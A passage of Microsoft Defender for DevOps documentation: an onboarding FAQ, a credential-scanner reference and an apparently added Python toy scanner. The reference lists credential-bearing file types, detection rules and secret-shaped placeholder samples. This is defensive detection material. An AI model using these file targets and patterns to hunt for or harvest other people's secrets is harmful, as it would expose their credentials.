files to CodeAnalysisLogs/msdo.sarif.

Why don't I see the results for my ADO projects in Microsoft Defender for Cloud?

When you use classic pipeline configuration, make sure you don't change the artifact name.
Changing it can result in not seeing the results for your project.


Currently, OSS vulnerability findings are only available for GitHub repositories. Azure
DevOps repositories will have the total exposed secrets, IaC misconfigurations, and code
security findings available. It will show n/a for OSS vulnerabilities. You can learn more
about how to Review your findings.


Why is my Azure DevOps repository not 
refreshing to healthy? 


For a previously unhealthy scan result to be healthy again, updated healthy scan results 
need to be from the same build definition as the one that generated the findings in the 
first place. A common scenario where this issue occurs is when testing with different 
pipelines. For results to refresh appropriately, scan results need to be for the same 
pipeline(s) and branch(es). 


If no scan is performed for 14 days, the scan results revert to N/A. 


Why don't I see Recommendations for findings?

Ensure that you've onboarded the project with the connector and that your repository
(that the build is for) is onboarded to Microsoft Defender for Cloud. You can learn how to
onboard your DevOps repository to Defender for Cloud.

You must have more than a stakeholder license to the repos to onboard them, and
you need to be at least the security reader on the subscription where the connector is
created. You can confirm if you've onboarded the repositories by seeing them in the
inventory list in Microsoft Defender for Cloud.


I successfully onboarded a connector, where can I find my DevOps recommendations?

We recommend navigating to the DevOps Security page to see an overview of your
DevOps recommendations and posture. You can sort and filter by the repos you care
about to dive into the recommendation details.

You can also view your DevOps recommendations on the Recommendations page.
Navigate to Recommendations, select the "All recommendations" tab, and filter the
environment by the relevant DevOps sources (e.g., AzureDevOps and/or GitHub).


What information does Defender for 
DevOps store about me and my 
enterprise, and where is the data stored 
and processed? 


Defender for DevOps connects to your source code management system, for example, 
Azure DevOps, GitHub, to provide a central console for your DevOps resources and 
security posture. Defender for DevOps processes and stores the following information: 


• Metadata on your connected source code management systems and associated
repositories. This data includes user, organizational, and authentication
information.
• Scan results for recommendations and assessments results and details.


Data is stored within the region your connector is created in and flows into Microsoft 
Defender for Cloud. You should consider which region to create your connector in, for 
any data residency requirements as you design and create your DevOps connector. 


Defender for DevOps currently doesn't process or store your code, build, and audit logs. 


Learn more about the Microsoft Privacy Statement.


Why are Delete Source and Write Code 
permissions required for Azure DevOps? 


Azure DevOps doesn't have the necessary granularity for its permissions. These 
permissions are required for some of the Defender for DevOps features, such as pull 
request annotations in order to work. 


Is Exemptions capability available and 
tracked for app sec vulnerability 
management? 


Exemptions aren't available for Defender for DevOps within Microsoft Defender for 
Cloud. 


Why am I not able to see GitHub 
Advanced Security for Azure Devops 
(GHAzDO) results in Defender for 
Cloud? 


Ensure you are using the same Subscription ID for GHAzDO and Defender for Cloud. If 
you are still unable to see the results, the issue might be caused by your ADO connector 
lacking the necessary scope. Defender for DevOps introduced new scopes to ADO 
connectors in June. If you created the connector before June and haven't updated it, 
you won't be able to see GHAzDO results due to missing scope on the connector. You 
would need to create a new ADO connector, which will automatically include the new 
scopes. 


Is continuous, automatic scanning 
available? 


Currently, scanning occurs at build time. 


Is it possible to block the developers 
committing code with exposed secrets? 


The ability to block developers from committing code with exposed secrets isn't 
currently available. 


Why am I not able to configure Pull 
Request Annotations? 


Make sure you have write (owner/contributor) access to the subscription. If you don't 
have this type of access today, you can get it through activating a Microsoft Entra role in 
PIM. 


What programming languages are 
supported by Defender for DevOps? 


The following languages are supported by Defender for DevOps:

• Python
• JavaScript
• TypeScript


Why am I getting an error that informs me that there's no CLI tool?

When you run the pipeline in Azure DevOps, you receive the following error: no such
file or directory, scandir 'D:\a\_msdo\versions\microsoft.security.devops.cli'.

The error is listed under Errors on the failed run's summary page, and the same message
appears in the Microsoft Security DevOps step of the job log.

This error occurs if you're missing the dotnet6 dependency in the pipeline's YAML
file. .NET 6 is required to allow the Microsoft Security DevOps extension to run.
Include it as a task in your YAML file (before the Microsoft Security DevOps task) to
eliminate the error.

You can learn more about Microsoft Security DevOps.


Can I migrate the connector to a different region?

For example, can I migrate the connector from the Central US region to the West Europe
region?

We don't support automatic migration for the Defender for DevOps connectors from
one region to another at this time.

If you want to move a connector's location, for example a GitHub or Azure DevOps
connector, to be stored in a different region than the original one where the connector
was created, the recommendation is to delete the existing connector and then to create
another connector in the new region.


Do API calls made by Defender for 
Cloud count against my consumption 
limit? 


Yes, API calls made by Defender for Cloud count against the Azure DevOps Global 
consumption limit. Defender for Cloud makes calls on-behalf of the user who onboards 
the connector. 


Why is my organization list empty in the UI?

If your organization list is empty in the UI after you onboarded an Azure DevOps
connector, you need to ensure that the organization in Azure DevOps is connected to
the Azure tenant that has the user who authenticated the connector.

For information on how to correct this issue, check out the DevOps troubleshooting
guide.

I have a large Azure DevOps organization with many repositories. Can I still onboard?

Yes, there is no limit to how many Azure DevOps repositories you can onboard to
Defender for DevOps.


However, there are two main implications when onboarding large organizations — speed 
and throttling. The speed of discovery for your DevOps repositories is determined by 
the number of projects for each connector (approximately 100 projects per hour). 
Throttling can happen because Azure DevOps API calls have a global rate limit and we 
limit the calls for project discovery to use a small portion of overall quota limits. 


Consider using an alternative Azure DevOps identity (i.e., an Organization Administrator
account used as a service account) to avoid individual accounts from being throttled
when onboarding large organizations. Below are some scenarios of when to use an
alternate identity to onboard a Defender for DevOps connector:

• Large number of Azure DevOps Organizations and Projects (~500 Projects or
more).
• Large number of concurrent builds which peak during work hours.
• Authorized user is a Power Platform user making additional Azure DevOps API
calls, using up the global rate limit quotas.

Once you have onboarded the Azure DevOps repositories using this account and
configured and run the Microsoft Security DevOps Azure DevOps extension in your
CI/CD pipeline, the scanning results will appear near instantaneously in Microsoft
Defender for Cloud.


Next steps 


Learn more about Defender for DevOps.


Credential scanner

Article • 02/01/2023

Defender for DevOps supports many types of files and rules. This article lists all of the
file types and rules that are available.


Supported file types

Credential scanning supports the following file types (glob patterns; entries without a
wildcard match a file name exactly):

0.001, 0.1, 0.8, *.sk, *password, pwd.txt, **/key, */key,
*.32bit, *.3des,
*.added_cluster, *.aes128, *.aes192, *.aes256, *.al, *.argfile, *.as, *.asax,
*.asmmeta, *.asmx, *.aspx, *.aurora, *.azure,
*.backup, *.bak, *.bas, *.bash_aliases, *.bash_history, *.bash_profile, *.bashrc,
*.bat, *.Beta, *.BF, *.bicep, *.bim,
*.clean, *.cls, *.cmd, *.code-workspace, *.coffee, *.conf, *.config, *.cpp, *.cscfg,
*.cshtm, *.cshtml, *.cxx,
*.dart, *.dat, *.data, *.dbg, *.defaults, *.definitions, *.deployment, dockerfile,
_dsa, *.dsql, *.dtsx,
_ecdsa, _ed25519, *.ext, *.ExtendedTests,
*.FF, *.frm,
*.gcfg, *.git, *.git/config, *.gitcredentials, *.go, *.gradle, *.groovy, *.grooy, *.gsh,
*.htm, *.html, *.htpassword, hubot,
id_rsa, *.idl, *.iis, *.is, *.inc, *.inf, *.ini, *.ino, *.insecure, *.install, *.ipynb,
*.isml,
*.js, *.json, *.jsonnet, *.jsx,
kefile, key, keyfile, *.key, *.key*, *.key.*, *.keys, *.keystore*,
*.linq, *.loadtest, *.local, *.log,
*.m, *.managers, *.map, *.md, *.md-e, *.mef, *.mst, *.my, *.mysql_aliases,
*.mysql_history, *.mysql_profile,
npmrc, *.nuspec,
*.ois_export, *.omi, *.opn, *.orig, *.out,
*.p12, *.p12*, *.params, password, *.positive, *.ppk*, *.priv, privatekey, privatkey,
*.prop, *.properties, *.ps, *.ps1, *.psclass1, *.psm1, psql_history, *.pub,
*.publishsettings, *.pubxml, *.pubxml.user, *.pvk*,
*.ray, *.reg, *.resx, *.retail, *.robot, *.rst, *.ruby, *.runsettings, TSO,
*.sample, *.SAMPLE, *.sarif, scopebindings.json, *.scr, *.script, *.sdf, *.secret,
*.settings, *.sh, *.shf, *.side, *.side2, *.snap, *.snippet, *.sql, *.ss,
ssh\config, ssh_config, *.ste, *.svc, *.svd, *.svg, *.svn-base, *.swift,
*.tcl, *.template, template, *.test, *.textile, *.tf, *.tfvars, tmdb, *.trd, *.trx,
*.ts, *.tsv, *.tsx, *.tt, *.txt,
*.user, user, userconfig*, *.usersaptinstall,
*.vb, *.vbs, *.vizfx, *.vue,
*.wadcfgx, *.waz, *.webtest, *.wsx, *.wtl,
*.xaml, *.xdt, *.xml, *.xslt,
*.yaml, *.yml,
*.zaliases, *.zhistory, *.zprofile, *.zsh_aliases, *.zsh_history, *.zsh_profile, *.zshrc
Supported exit codes

The following exit codes are available for credential scanning:

Code   Description
0      Scan completed successfully with no application warning, no suppressed match, no credential match.
1      Partial scan completed with nothing but application warning.
2      Scan completed successfully with nothing but suppressed match(es).
3      Partial scan completed with both application warning(s) and suppressed match(es).
4      Scan completed successfully with nothing but credential match(es).
5      Partial scan completed with both application warning(s) and credential match(es).
6      Scan completed successfully with both suppressed match(es) and credential match(es).
7      Partial scan completed with application warning(s), suppressed match(es) and credential match(es).
-1000  Scan failed with command line argument error.
-1100  Scan failed with app settings error.
-1500  Scan failed with other configuration error.
-1600  Scan failed with IO error.
-9000  Scan failed with unknown error.


Rules and descriptions

The following are the available rules and descriptions for credential scanning.

CSCAN-AWS0010
Amazon S3 Client Secret Access Key
Sample: Aws Secret: abcdefghijklmnopqrst0123456789/+ABCDEFGH;
Learn more about Setup Credentials and Access keys.

CSCAN-AZURE0010
Azure Subscription Management Certificate
Sample: <Subscription id="..." ManagementCertificate="MIIPuQIBGSIb3DQEHAaCc..."
Learn more about Azure API management certificates.

CSCAN-AZURE0020
Azure SQL Connection String
Sample: <add key="ConnectionString" value="Server=tcp:server.database.windows.net;database=database;user=user;password=ZYXWVU_2;"
Learn more about SQL database Azure AD authentication configure.

CSCAN-AZURE0030
Azure Service Bus Shared Access Signature
Sample: Endpoint=sb://account.servicebus.windows.net;SharedAccessKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
ServiceBusNamespace=...SharedAccessPolicy=...Key=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
Learn more about Service Bus authentication and authorization and Service Bus access control with Shared Access Signatures.

CSCAN-AZURE0040
Azure Redis Cache Connection String Password
Sample: HostName=account.redis.cache.windows.net;Password=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
Learn more about Azure Cache for Redis.

CSCAN-AZURE0041
Azure Redis Cache Identifiable Secret
Sample: HostName=account.redis.cache.windows.net;Password=cThIYLCD6H7LrWrNHQjxhaSBu42KeSzG1AzCaNQJXdA=
HostName=account.redis.cache.windows.net;Password=FbQqSu216MvwNaquSqpI8MVe0hqlUPgGChOY19dc9xDRMAzCaixCYbQ
Learn more about Azure Cache for Redis.

CSCAN-AZURE0050
Azure IoT Shared Access Key
Sample: HostName=account.azure-devices.net;SharedAccessKeyName=key;SharedAccessKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
iotHub...abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
Learn more about Securing your Internet of Things (IoT) deployment and Control access to IoT Hub using Shared Access Signatures.

CSCAN-AZURE0060
Azure Storage Account Shared Access Signature
Sample: https://account.blob.core.windows.net/?sr=...&sv=...&st=...&se=...&sp=...&sig=abcdefghijklmnopqrstuvwxyz0123456789%2F%2BABCDE%3D
Learn more about Delegating access by using a shared access signature and Migrate an application to use passwordless connections with Azure services.

CSCAN-AZURE0061
Azure Storage Account Shared Access Signature for High Risk Resources
Sample: https://account.blob.core.windows.net/file.cspkg?...&sig=abcdefghijklmnopqrstuvwxyz0123456789%2F%2BABCDE%3D
Learn more about Delegating access by using a shared access signature and Migrate an application to use passwordless connections with Azure services.

CSCAN-AZURE0062
Azure Logic App Shared Access Signature
Sample: https://account.logic.azure.com/?...&sig=abcdefghijklmnopqrstuvwxyz0123456789%2F%2BABCDE%3D
Learn more about Securing access and data in Azure Logic Apps.

CSCAN-AZURE0070
Azure Storage Account Access Key
Sample: Endpoint=account.table.core.windows.net;AccountName=account;AccountKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
AccountName=account;AccountKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==...;
PrimaryKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
Learn more about Authorization with Shared Key.

CSCAN-AZURE0071
Azure Storage Identifiable Secret
Sample: Endpoint=table.core.windows.net;AccountName=account;AccountKey=U1imxXW0acA5QRtnkKuW14QPSC/F1JFS9m0jd8Ny/Muab42CVkI8G0/ja7uM13G1fiS8pp4c/kzYp+AStvBjS1w==
AccountName=account;AccountKey=U1imxXW0acA5QRtnkKuW14QPSC/F1JFS9m0jd8Ny/Muab42CVkI8G0/ja7uM13G1fiS8pp4c/kzYp+AStvBjS1w==;EndpointSuffix=...;
PrimaryKey=U1imxXW0acA5QRtnkKuW14QPSC/F1JFS9m0jd8Ny/Muab42CVkI8G0/ja7uM13G1fiS8pp4c/kzYp+AStvBjS1w==
Learn more about Authorization with Shared Key and Migrating an application to use passwordless connections with Azure services.

CSCAN-AZURE0080
Azure COSMOS DB Account Access Key
Sample: AccountEndpoint=https://account.documents.azure.com;AccountKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
DocDbConnectionStr...abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
Learn more about Securing access to data in Azure Cosmos DB.

CSCAN-AZURE0081
Identifiable Azure COSMOS DB Account Access Key
Sample: AccountEndpoint=https://account.documents.azure.com;AccountKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
DocDbConnectionStr...abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
Learn more about Securing access to data in Azure Cosmos DB.

CSCAN-AZURE0090
Azure App Service Deployment Password
Sample: userPWD=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOPQRSTUV;
PublishingPassword=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOPQRSTUV;
Learn more about Configuring deployment credentials for Azure App Service and Get publish settings from Azure and import into Visual Studio.

CSCAN-AZURE0100
Azure DevOps Personal Access Token
Sample: URL="org.visualstudio.com/proj"; PAT = "ntpi2ch67ci2vjzcohglogyygwo5fuy1365n2zdowwxhsys6jnoa"
URL="dev.azure.com/org/proj"; PAT = "ntpi2ch67ci2vjzcohglogyygwo5fuy1365n2zdowwxhsys6jnoa"
Learn more about Using personal access tokens.

CSCAN-AZURE0101
Azure DevOps App Secret
Sample: AdoAppId=...;AdoAppSecret=ntph2ch67ciqunzcohglogyygwo5fuy1365n4zdowwxhsys6jnoa;
Learn more about Authorizing access to REST APIs with OAuth 2.0.

CSCAN-AZURE0120
Azure Function Primary / API Key
Sample: https://account.azurewebsites.net/api/function?code=abcdefghijklmnopqrstuvwxyz0123456789%2F%2BABCDEF0123456789%3D%3D...
ApiEndpoint=account.azurewebsites.net/api/function;Apikey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOP==;
x-functions-key: abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOP==
Learn more about Getting your function access keys and Function access keys.

CSCAN-AZURE0121
Identifiable Azure Function Primary / API Key
Sample: https://account.azurewebsites.net/api/function?code=abcdefghijklmnopqrstuvwxyz0123456789%2F%2BABCDEF0123456789%3D%3D...
ApiEndpoint=account.azurewebsites.net/api/function;Apikey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOP==;
x-functions-key: abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOP==
Learn more about Getting your function access keys and Function access keys.

CSCAN-AZURE0130
Azure Shared Access Key / Web Hook Token
Sample: PrimaryKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=;
Learn more about Security claims and Azure Media Services concepts.

CSCAN-AZURE0140
Azure AD Client Access Token
Sample: Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJS...
Learn more about Requesting an access token in Azure Active Directory B2C.

CSCAN-AZURE0150
Azure AD User Credentials
Sample: username=user@tenant.onmicrosoft.com;password=ZYXWVU$1;
Learn more about Resetting a user's password using Azure Active Directory.

CSCAN-AZURE0151
Azure AD Client Secret
Sample: "AppId=01234567-abcd-abcd-abcd-abcdef012345;AppSecret="abc7Q~defghijklmnopqrstuvwxyz-_.~0123"
"AppId=01234567-abcd-abcd-abcd-abcdef012345;AppSecret="abc8Q~defghijklmnopqrstuvwxyz-_.~0123456"
Learn more about Securing service principals.

CSCAN-AZURE0152
Azure Bot Service App Secret
Sample: "account.azurewebsites.net/api/messages;AppId=01234567-abcd-abcd-abcd-abcdef012345;AppSecret="abcdeFGHIIJ0K1234567%;[@"
Learn more about Authentication types.

CSCAN-AZURE0160
Azure Databricks Personal Access Token
Sample: account.azuredatabricks.net;PAT=dapiabcdef0123456789abcdef0123456789;
Learn more about Managing personal access tokens.

CSCAN-AZURE0170
Azure Container Registry Access Key
Sample: account.azurecr.io/ #docker password: abcdefghijklmnopqr0123456789/+AB;
Learn more about Admin account and Create a token with repository-scoped permissions.

CSCAN-AZURE0180
Azure Batch Shared Access Key
Sample: Account=account.batch.azure.net;AccountKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=;
Learn more about Batch security and compliance best practices and Create a Batch account with the Azure portal.

CSCAN-AZURE0181
Identifiable Azure Batch Shared Access Key
Sample: Account=account.batch.azure.net;AccountKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=;
Learn more about Batch security and compliance best practices and Create a Batch account with the Azure portal.

CSCAN-AZURE0190
Azure SignalR Access Key
Sample: host: account.service.signalr.net; accesskey: abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=;
Learn more about How to rotate access key for Azure SignalR Service.

CSCAN-AZURE0200
Azure Event Grid Access Key
Sample: host: account.eventgrid.azure.net; accesskey: abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=;
Learn more about Getting access keys for Event Grid resources (articles or domains).

CSCAN-AZURE0210
Azure Machine Learning Web Service API Key
Sample: host: account.azureml.net/services/01234567-abcd-abcd-abcd-abcdef012345/workspaces/01234567-abcd-abcd-abcd-abcdef012345/; apikey: abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==;
Learn more about How to consume a Machine Learning Studio (classic) web service.

CSCAN-AZURE0211
Identifiable Azure Machine Learning Web Service API Key
Sample: host: account.azureml.net/services/01234567-abcd-abcd-abcd-abcdef012345/workspaces/01234567-abcd-abcd-abcd-abcdef012345/; apikey: abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
Learn more about How to consume a Machine Learning Studio (classic) web service.

CSCAN-AZURE0220
Azure Cognitive Search API Key
Sample: host: account.search.windows.net; apikey: abcdef0123456789abcdef0123456789;
Learn more about Connecting to cognitive search using key authentication.

CSCAN-AZURE0221
Azure Cognitive Service Key
Sample: cognitiveservices.azure.com...apikey=abcdef0123456789abcdef0123456789;
api.cognitive.microsoft.com...apikey=abcdef0123456789abcdef0123456789;
Learn more about Connecting to cognitive search using key authentication.

CSCAN-AZURE0222
Identifiable Azure Cognitive Search Key
Sample: cognitiveservices.azure.com...apikey=abcdefghijklmnopqrstuvwxyz0123456789ABCDEFAZSeKLMNOP;
api.cognitive.microsoft.com...apikey=abcdefghijklmnopqrstuvwxyz0123456789ABCDEFAZSeKLMNOP;
Learn more about Connecting to cognitive search using key authentication.

CSCAN-AZURE0230
Azure Maps Subscription Key
Sample: host: atlas.microsoft.com; key: abcdefghijklmnopqrstuvwxyz0123456789-_ABCDE;
Learn more about Managing authentication in Azure Maps.

CSCAN-AZURE0250
Azure Bot Framework Secret Key
Sample: host: webchat.botframework.com/?s=abcdefghijklmnopqrstuvwxyz.0123456789_ABCDEabcdefghijkl&...
host: webchat.botframework.com/?s=abcdefghijk.lmn.opq.rstuvwxyz0123456789-_ABCDEFGHIJKLMNOPQRSTUV&...
Learn more about Connecting a bot to Web Chat.

CSCAN-GENERAL0020
X.509 Certificate Private Key
Sample: (binary certificate file: *.pfx, *.key...)
-----BEGIN PRIVATE KEY----- MIIPuQIBAzCCD38GCSqGSIb3DQEH...
-----BEGIN DSA PRIVATE KEY----- MIIPuQIBAzCCD38GCSqGSIb3DQEH...
-----BEGIN EC PRIVATE KEY----- ...
-----BEGIN OPENSSH PRIVATE KEY----- MIIPuQIBAzCCD38GCSqGSIb3DQEH...
certificate = "MIIPuQIBAzCCD38GCSqGSIb3DQEH..."
Learn more about Getting started with Key Vault certificates.

CSCAN-GENERAL0030
User sign in Credentials
Sample: { "user": "user_name", "password": "ZYXWVU_2" }
Learn more about Setting and retrieving a secret from Azure Key Vault using the Azure portal.

CSCAN-GENERAL0031
ODBC Connection String
Sample: data source=...;initial catalog=...;user=...;password=ZYXWVU_2;
Learn more about Connection strings reference.

CSCAN-GENERAL0050
ASP.NET Machine Key
Sample: machineKey validationKey="ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789" decryptionKey="ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789"...
Learn more about MachineKey Class.

CSCAN-GENERAL0060
General Password
Sample: UserName=...;Password=abcdefgh0123456789/+A==;
tool.exe ...-u ... -p..."ZYXWVU_2"...
<secret>ZYXWVU_3</secret>
NetworkCredential(..., ZYXWVU_2)
net use .../u:redmond... /p ZYXWVU_2
schtasks.../ru ntdev.../rp ZYXWVU_2
RemoteUserNameParameter:...;;RemotePasswordParameter:***;;
Learn more about Setting and retrieving a secret from Azure Key Vault using the Azure portal.

CSCAN-GENERAL0070
General Password in URL
Sample: https://my.zoom.us/636362?pwd=ZYXWVU
https://www.microsoft.com/?secret=ZYXWVU
Learn more about Setting and retrieving a secret from Azure Key Vault using the Azure portal.

CSCAN-GENERAL0120
Http Authorization Header
Sample: Authorization: Basic ABCDEFGHIJKLMNOPQRS0123456789;
Authorization: Digest ABCDEFGHIJKLMNOPQRS0123456789;
Learn more about HttpRequestHeaders.Authorization Property.

CSCAN-GENERAL0130
Client Secret / API Key
Sample: client_secret=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
ida:password=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
ida:...issuer...Api...abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
Namespace...ACS...Issuer...abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
IssuerName...IssuerSecret=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=
App_Secret=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE==
Learn more about The Client ID and Secret and How and why applications are added to Azure AD.

CSCAN-GENERAL0140
General Symmetric Key
Sample: key=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE=;
Learn more about AES Class.

CSCAN-GENERAL0150
Ansible Vault
Sample: $ANSIBLE_VAULT;1.1;AES256abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE...
Learn more about Protecting sensitive data with Ansible vault.

CSCAN-GH0010
GitHub Personal Access Token
Sample: pat=ghp_abcdefghijklmnopqrstuvwxyzABCD012345
pat=v1.abcdef0123456789abcdef0123456789abcdef01
https://user:abcdef0123456789abcdef0123456789abcdef01@github.com
Learn more about Creating a personal access token.

CSCAN-GOOG0010
Google API key
Sample: apikey=AIzaefgh0123456789_-ABCDEFGHIJKLMNOPQRS;
Learn more about Authentication using API keys.

CSCAN-MSFT0100
Microsoft Bing Maps Key
Sample: bingMapsKey=abcdefghijklmnopqrstuvwxyz0123456789-_ABCDEabcdefghijklmnopqrstu
...bing.com/api/maps/...key=abcdefghijklmnopqrstuvwxyz0123456789-_ABCDEabcdefghijklmnopqrstu
...dev.virtualearth.net/...key=abcdefghijklmnopqrstuvwxyz0123456789-_ABCDEabcdefghijklmnopqrstu
Learn more about Getting a Bing Maps Key.

CSCAN-WORK0010
Slack Access Token
Sample: slack_token=xoxp-abcdef-abcdef-abcdef-abcdef;
slack_token=xoxb-abcdef-abcdef;
slack_token=xoxa-2-abcdef-abcdef-abcdef-abcdef;
slack_token=xoxr-abcdef-abcdef-abcdef-abcdef;
Learn more about Token types.
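The three conventions above (the supported file-type allowlist, rule ids with sample-shaped matches, and the exit-code table) fit together in one small scanner. The following is an added example written for this page, not Microsoft's CredScan code; the regexes are assumptions derived from the documented samples, the file-type subset is an assumption, and the repository contents are constructed.

```python
"""Toy credential scanner modelled on the CredScan conventions documented above:
a supported-file-type filter, rule ids with patterns derived from the page's
samples, and the documented exit-code scheme. Added example, not Microsoft's code."""
import re
from dataclasses import dataclass

# Subset of the "Supported file types" list (assumption: enough for this demo).
SUPPORTED_NAMES = {"dockerfile", "id_rsa", "npmrc", "password", "privatekey"}
SUPPORTED_SUFFIXES = (".json", ".yaml", ".yml", ".md", ".sh", ".ps1", ".txt", ".properties")

# Rule id -> (description, pattern). The patterns are assumptions written from
# the page's samples; the real rule definitions are not published.
RULES = {
    "CSCAN-AZURE0151": ("Azure AD Client Secret",
                        re.compile(r"\b[A-Za-z0-9]{3}[78]Q~[A-Za-z0-9._~-]{31,34}")),
    "CSCAN-AZURE0160": ("Azure Databricks Personal Access Token",
                        re.compile(r"\bdapi[0-9a-f]{32}\b")),
    "CSCAN-AZURE0140": ("Azure AD Client Access Token",
                        re.compile(r"Bearer\s+eyJ[A-Za-z0-9_.-]+")),
    "CSCAN-GH0010": ("GitHub Personal Access Token",
                     re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    "CSCAN-WORK0010": ("Slack Access Token",
                       re.compile(r"\bxox[pbar]-[A-Za-z0-9-]+")),
}


@dataclass
class Finding:
    path: str
    line: int
    rule_id: str
    description: str
    suppressed: bool


def is_supported(path: str) -> bool:
    """Apply the allowlist the way the *.ext / bare-name list implies."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in SUPPORTED_NAMES or name.endswith(SUPPORTED_SUFFIXES)


def exit_code(app_warning: bool, suppressed_match: bool, credential_match: bool) -> int:
    """Codes 0..7 in the exit-code table are a bit set: 1 = partial scan
    (application warning), 2 = suppressed match(es), 4 = credential match(es)."""
    return (1 if app_warning else 0) | (2 if suppressed_match else 0) | (4 if credential_match else 0)


def scan_files(files: dict, suppressions=frozenset(), app_warnings: int = 0):
    """files maps path -> content. suppressions holds (rule_id, path) pairs an
    analyst has reviewed and accepted (for example documented sample values).
    Returns (findings, exit_code)."""
    findings = []
    for path, text in files.items():
        if not is_supported(path):
            continue  # unsupported file types are never opened
        for lineno, line in enumerate(text.splitlines(), 1):
            for rule_id, (desc, pattern) in RULES.items():
                if pattern.search(line):
                    findings.append(Finding(path, lineno, rule_id, desc,
                                            (rule_id, path) in suppressions))
    code = exit_code(app_warnings > 0,
                     any(f.suppressed for f in findings),
                     any(not f.suppressed for f in findings))
    return findings, code


# Constructed sample repository; the secret-shaped values are the page's own samples.
SAMPLE_FILES = {
    "app/appsettings.json": (
        '{\n  "AppId": "01234567-abcd-abcd-abcd-abcdef012345",\n'
        '  "AppSecret": "abc7Q~defghijklmnopqrstuvwxyz-_.~0123"\n}\n'),
    "scripts/deploy.sh": (
        "export GITHUB_TOKEN=ghp_abcdefghijklmnopqrstuvwxyzABCD012345\n"
        'curl -H "Authorization: Bearer $TOKEN" https://example.invalid/\n'),  # placeholder, not a token
    "ci/notify.ps1": '$slack = "xoxb-abcdef-abcdef"\n',
    "README.md": "Databricks token format: dapiabcdef0123456789abcdef0123456789\n",
    "build/output.bin": "dapiabcdef0123456789abcdef0123456789\n",  # not a supported type
}
# The README hit is a documented format example, so it is suppressed rather than fixed.
SAMPLE_SUPPRESSIONS = frozenset({("CSCAN-AZURE0160", "README.md")})

if __name__ == "__main__":
    results, code = scan_files(SAMPLE_FILES, SAMPLE_SUPPRESSIONS)
    for f in results:
        state = "suppressed" if f.suppressed else "MATCH"
        print(f"{state:10} {f.rule_id} {f.description} at {f.path}:{f.line}")
    print("exit code:", code)  # 6: suppressed match(es) and credential match(es)
```

A CI step would treat codes 4 to 7 as a failed gate and code 2 as a pass with an audit trail, exactly as the table above distinguishes them.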


Next steps 


Overview of Defender for DevOps 


Archive for what's new in Defender for Cloud? 


Article • 09/06/2023 


The primary What's new in Defender for Cloud? release notes page contains updates for the last six 
months, while this page contains older items. 


This page provides you with information about: 


• New features 
• Bug fixes 
• Deprecated functionality 


March 2023 


Updates in March include: 


• A new Defender for Storage plan is available, including near-real time malware scanning and sensitive data threat detection 
• Data-aware security posture (preview) 
• Improved experience for managing the default Azure security policies 
• Defender CSPM (Cloud Security Posture Management) is now Generally Available (GA) 
• Option to create custom recommendations and security standards in Microsoft Defender for Cloud 
• Microsoft cloud security benchmark (MCSB) version 1.0 is now Generally Available (GA) 
• Some regulatory compliance standards are now available in government clouds 
• New preview recommendation for Azure SQL Servers 
• New alert in Defender for Key Vault 


A new Defender for Storage plan is available, including near-real time malware scanning and sensitive data threat detection 


Cloud storage plays a key role in the organization and stores large volumes of valuable and sensitive 
data. Today we're announcing a new Defender for Storage plan. If you're using the previous plan (now 
renamed to "Defender for Storage (classic)"), you'll need to proactively migrate to the new plan in 
order to use the new features and benefits. 


The new plan includes advanced security capabilities to help protect against malicious file uploads, 
sensitive data exfiltration, and data corruption. It also provides a more predictable and flexible pricing 
structure for better control over coverage and costs. 


The new plan has new capabilities now in public preview: 

• Detecting sensitive data exposure and exfiltration events 
• Near real-time blob on-upload malware scanning across all file types 
• Detecting entities with no identities using SAS tokens 


These capabilities enhance the existing Activity Monitoring capability, based on control and data plane 
log analysis and behavioral modeling to identify early signs of breach. 


All these capabilities are available in a new predictable and flexible pricing plan that provides granular 
